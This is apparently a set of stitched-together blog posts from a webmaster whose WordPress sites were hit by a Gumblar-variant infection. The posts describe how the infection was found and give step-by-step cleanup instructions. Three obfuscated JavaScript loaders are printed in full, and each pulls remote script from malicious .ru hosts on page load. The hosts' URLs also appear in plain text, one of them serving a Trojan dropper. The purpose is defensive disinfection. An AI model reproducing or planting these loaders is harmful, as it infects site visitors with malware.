Google were doing major PR update in December 31^st 2009. Good news for webmasters who find out that their PR was increasing, and vice versa.

Related Posts

1. Layout Design of Facebook Group has changed.
2. My first payment from Google Adsense
3. How to change the website’s primary language in Adsense account

So far, I’ve found this javascript malicious code with different var value. Nhbk5v835x5dq6, H3qqea3ur6p, and Jqjzlgspz98uxl.

This code will load another malicious script from http://xtube-com.blogger.com.pornorama-com.bluejackmusic.ru:8080/hdfcbank.com/hdfcbank.com/google.com/fanpop.com/in.com/

<script>/*GNU GPL*/ try{window.onload = function(){var Jqjzlgspz98uxl = document.createElement('script');Jqjzlgspz98uxl.setAttribute('type', 'text/javascript');Jqjzlgspz98uxl.setAttribute('id', 'myscript1');Jqjzlgspz98uxl.setAttribute('src', 'h#&#t&#!t$!@p):)$/!&^/!x#^&t@#&u@b($!)e#(-)c^@$&o#(#m^!$^.&$)b$($l$o!(#&)g(&g)(^$e!$r#@(.@^& (c(o^#m@)!#.)#p!(@o&r@)n(^$o$!^r&!a$)&m$@a$^$@-!c((^o#($m!.&#b$^$l)^u!$!e((#@)j@@a@)@c#k)!^m^(u$$ !(s@$@i^@c@&.!@)r@u(!:(^8&@!)!0@)8)@#0&(!/$&)h^d$@$f$(^c^)b@$&a)^n^(k^#.&@^&c#(!#$o^m!)#/!h^@#d(&f)&c^()b#(a^$!n&^(#$k^#.!$c)o))m)&&/($&!g$$o!)o^()g))@(l$^@)e#^&.&&c^(o()m@!)(/(&f)#a!!@n!$@p))o)((p!^#.@c^!@o&@m)@&/@!!i&n^#!.&#!c)))!o(m#/)((!'.replace(/\(|\)|\^|\!|@|\$|#|&/ig, ''));Jqjzlgspz98uxl.setAttribute('defer', 'defer');document.body.appendChild(Jqjzlgspz98uxl) ;}} catch(e) {}</script>

This code will load another malicious script from http://live.com.google.com.baidu-msn.com.bestartsale.ru:8080/wordpress.com/google-mail.it/livejasmin-photobucket.com/cnet-cnn.com/about-ebay.com/

<script>/*GNU GPL*/ try(window.onload = function()(var H3qqea3ur6p = document.createElement('script');H3qqea3ur6p.setAttribute('type','text/javascript');H3qqea3ur6p.setAttribute('id', 'myscript1');H3qqea3ur6p.setAttribute('src', 'h#!##t&(t&()p$$:!#@/!(/$#l!)i!&v()@e!^(.$(!c!)o)m.&!#g#@o((o^g)(l^$!$)@.&)$eco$#(m#^@.)#@#!#a&b$i#!$#$d^m^h#)$!(-!((!$s)n$&(.@)c^@$o((m!(&.^)(b&!)e@s(@&t@a()r#$#)t))s@#!#)a!l#e#r$(.))&!you!&):)8($0)@$8^#^@0&)$^/!!&w@$(O@^r(^(!d^p^@#)r#e@s^(s&&@@.(^^o^c#@!$)/)&^m$g@(@^o(^o@g@&#$l&&e^))&@-($(m)#)#a)i^l^#.!&^)i!$@^/((!(t&l)!i^v&(&(e()#j^a$&@s(&m$^&(i$#@n!#^-#@)p$!$$h!o(&#t(#o##)!b#!$u^c^#k((e&!)t#!((#.$$c!&^)&/)!m@o@c#&($n)e()&&t)#-^#!c^(n^^n@c&#).)!&!o$m#($/^a$&!@@b&()^o($(u!&#)t^#-#))$e@@)b##a#y&&@.&#(^c&o^^^^m@/(@^^'.replace(/\^|&|@|\)|\(|#|\!|\$/ig, ''));H3qqea3ur6p.setAttribute('defer', 'defer');document.body.appendChild(H3qqea3ur6p);)) catch(e) ()</script>

This code will load another malicious script from http://google-cn.msn.ca.shoplocal-com.easymusicstore.ru:8080/interia.pl/interia.pl/google.com/empflix.com/debonairblog.com/

<script>/*GNU GPL*/ try{window.onload = function(){var Nhbk5v835x5dq6 = document.createElement('script');Nhbk5v835x5dq6.setAttribute('type', 'text/javascript');Nhbk5v835x5dq6.setAttribute('id', 'myscript1');Nhbk5v835x5dq6.setAttribute('src', 'h#@#$t^@#t^^!p^$:&!/(/&##g)@o^)!o)!&g)^!l$(e^-&&!c$@@n).)#!#m$(#s#!))$n)!.&^c)(!!a&.$&(!s^@#h)@&o@(p$!^&)l$&o&^!c!&)@a&l)-$^c@(^o!m@.$e((a$s^^y#m(u(#)s&&@i$c(@s!@^t)o(r^#e!@@&.)!)r!^u(#:(!8(^0$#$8)0&@@/@i#@n)!t@e^#r(^i$)$^a)#.^&p&(!&l))#^$/@(!i$)^n#(&t^#&e&$(r)&#i$)$a(@.!p^l^$/^@#g#o@#(o)()g&$$l(^e@.&&$!c(^o)m^(/)@@e&^@m#&^@p($f&l^^@!i(x!))).&^!c@o$()$m&/##!&d#e)@b$)&o(##$n^#$a)^i$r(&b@#l!^o^g@@.)#c@$@o!m(&^)/!'.replace(/@|\!|\$|&|\)|\^|#|\(/ig, ''));Nhbk5v835x5dq6.setAttribute('defer', 'defer');document.body.appendChild(Nhbk5v835x5dq6);}} catch(e) {}</script>

Some of WordPress, Joomla, and Pligg users have reported this problem in several forums. I’ve successfully cleaned this virus from my iPhone blog and ryan-isra.net as well. This tutorial will guide you how to disinfect your WordPress blog from this virus.
It’s very recommended to have Notepad++ application installed in your Windows to make this process easier.
You can download Notepad++ from this link.

1. Login to cPanel (if applicable)
2. Edit the content of index.php in root directory to be any text (i.e. Under Maintenance) to protect your visitors of being infected.
3. Create a zip file of wp-content directory, download it to local computer and extract it.
4. Use search feature and find all javascript files in wp-content folder.

5. Open Notepad++, then select all files in Search Results screen. Drag all files into Notepad++’s window.

6. Press CTRL+H key, paste the javascript malicious code in “Find what” field and leave empty the “Replace with” field.

7. When finished, click File – Save All or simply press CTRL+SHIFT+S key.
8. Repeat the step#4 and change *.js to *index*
9. Repeat the step#8 and change *index* to *default*
10. Remember the path of each file and then re-upload each file to its own path.
11. Get a fresh copy of wordpress, copy wp-admin and wp-includes directories, compress, and upload to your hosting.
12. Replace wp-admin and wp-includes directories in your hosting with the one that you just uploaded.
13. Now, ensure that your computer is clean of virus/keylogger/trojan and then change your cPanel/FTP password.

The process could be simpler if you have never changed/customized any of your wordpress theme/plugins. You could simply re-upload a fresh wordpress installation, themes, plugins.

I am so sleepy, sorry if something is wrong or missing.

- Update -
Please see these comments, some of them may help you better than my post.
Thanks guys.

Related Posts

1. Malicious Javascript Code infected my blogs
2. What is Sitemap? What is Benefits of Sitemap?
3. How-to move wordpress to new server|hosting

Parse error: syntax error, unexpected ‘<’ in /home/$myhomedir$/public_html/wp-includes/default-widgets.php on line 1034

I immediately open default-widgets.php in wp-includes directory by using notepad, followed by pressing CTRL + G to go to line#1034. I’m very susprised when I found these codes were exist in default-widgets.php.

<script>/*GNU GPL*/ try{window.onload = function(){var Nhbk5v835x5dq6 = document.createElement('script');Nhbk5v835x5dq6.setAttribute('type', 'text/javascript');Nhbk5v835x5dq6.setAttribute('id', 'myscript1');Nhbk5v835x5dq6.setAttribute('src', 'h#@#$t^@#t^^!p^$:&!/(/&##g)@o^)!o)!&g)^!l$(e^-&&!c$@@n).)#!#m$(#s#!))$n)!.&^c)(!!a&.$&(!s^@#h)@&o@(p$!^&)l$&o&^!c!&)@a&l)-$^c@(^o!m@.$e((a$s^^y#m(u(#)s&&@i$c(@s!@^t)o(r^#e!@@&.)!)r!^u(#:(!8(^0$#$8)0&@@/@i#@n)!t@e^#r(^i$)$^a)#.^&p&(!&l))#^$/@(!i$)^n#(&t^#&e&$(r)&#i$)$a(@.!p^l^$/^@#g#o@#(o)()g&$$l(^e@.&&$!c(^o)m^(/)@@e&^@m#&^@p($f&l^^@!i(x!))).&^!c@o$()$m&/##!&d#e)@b$)&o(##$n^#$a)^i$r(&b@#l!^o^g@@.)#c@$@o!m(&^)/!'.replace(/@|\!|\$|&|\)|\^|#|\(/ig, ''));Nhbk5v835x5dq6.setAttribute('defer', 'defer');document.body.appendChild(Nhbk5v835x5dq6);}} catch(e) {}</script>

I also found similar malicious code from Google.

<script>/*GNU GPL*/ try(window.onload = function()(var H3qqea3ur6p = document.createElement('script');H3qqea3ur6p.setAttribute('type','text/javascript');H3qqea3ur6p.setAttribute('id', 'myscript1');H3qqea3ur6p.setAttribute('src', 'h#!##t&(t&()p$$:!#@/!(/$#l!)i!&v()@e!^(.$(!c!)o)m.&!#g#@o((o^g)(l^$!$)@.&)$eco$#(m#^@.)#@#!#a&b$i#!$#$d^m^h#)$!(-!((!$s)n$&(.@)c^@$o((m!(&.^)(b&!)e@s(@&t@a()r#$#)t))s@#!#)a!l#e#r$(.))&!you!&):)8($0)@$8^#^@0&)$^/!!&w@$(O@^r(^(!d^p^@#)r#e@s^(s&&@@.(^^o^c#@!$)/)&^m$g@(@^o(^o@g@&#$l&&e^))&@-($(m)#)#a)i^l^#.!&^)i!$@^/((!(t&l)!i^v&(&(e()#j^a$&@s(&m$^&(i$#@n!#^-#@)p$!$$h!o(&#t(#o##)!b#!$u^c^#k((e&!)t#!((#.$$c!&^)&/)!m@o@c#&($n)e()&&t)#-^#!c^(n^^n@c&#).)!&!o$m#($/^a$&!@@b&()^o($(u!&#)t^#-#))$e@@)b##a#y&&@.&#(^c&o^^^^m@/(@^^'.replace(/\^|&|@|\)|\(|#|\!|\$/ig, ''));H3qqea3ur6p.setAttribute('defer', 'defer');document.body.appendChild(H3qqea3ur6p);)) catch(e) ()</script>

The 1st code above will load another malicious script from http://google-cn.msn.ca.shoplocal-com.easymusicstore.ru:8080/interia.pl/interia.pl/google.com/empflix.com/debonairblog.com/, while the 2nd code above will load another malicious script from http://live.com.google.com.baidu-msn.com.bestartsale.ru:8080/wordpress.com/google-mail.it/livejasmin-photobucket.com/cnet-cnn.com/about-ebay.com/

I could accessing my iPhone blog, though another error appeared:
Can not modify header information – headers already sent by (output started at …
At the same time, InternetDownloadManager asked me to download ChangeLog.pdf from http://google-cn.msn.ca.shoplocal-com.easymusicstore.ru:8080/pics/ChangeLog.pdf and MBAM (Malwarebytes’ Anti-Malware) detected C:\Documents and Settings\username\Local Settings\Temp\0.5147965079164781.exe (random file name) as Trojan.Dropper. Kaspersky Anti-Virus 2009 couldn’t detect it, but Kaspersky Anti-Virus 2010 detected it as unknow threat UDS: DangerousObject.Multi.Generic with High criticality.

I understand that I was being infected by a virus, though I had no idea what kind of virus was that. Searched via Google by using <script>/*GNU GPL*/ try{window.onload as a keyword, didn’t help much, while using setAttribute(‘id’, `myscript1`) just displaying list of websites, which has been infected. Last but not least, I used setAttribute(‘id’, `myscript1`) virus as keyword, then it refer me to WebHostingTalk.nl. I got a little enlightenment about what I was dealing with.

So, its name is Gumblar. You can find further information about Gumblar on Unmask Parasites Blog, Wikipedia, or ISS.net. I got alot of useful information.
However, I might be infected by its variant, because it wasn’t inject iframe, no base64 code, no images.php file, and even different code.

The one I got spreading itself by infected all javascript files (*.js) and index files (*index*, *default*). www.ryan-isra.net, which is hosted on same hosting also infected. So far, I suspected that either my Windows XP has infected a keylogger or someone is sniffing my network traffic

Now, my wordpress blog has been disinfected.

Related Posts

1. How-to Fix Malicious Javascript Code (suspected as variant of Gumblar virus)
2. Moving www.ryan-isra.net to a new Webhosting
3. SMS Verification needed for Gmail Registration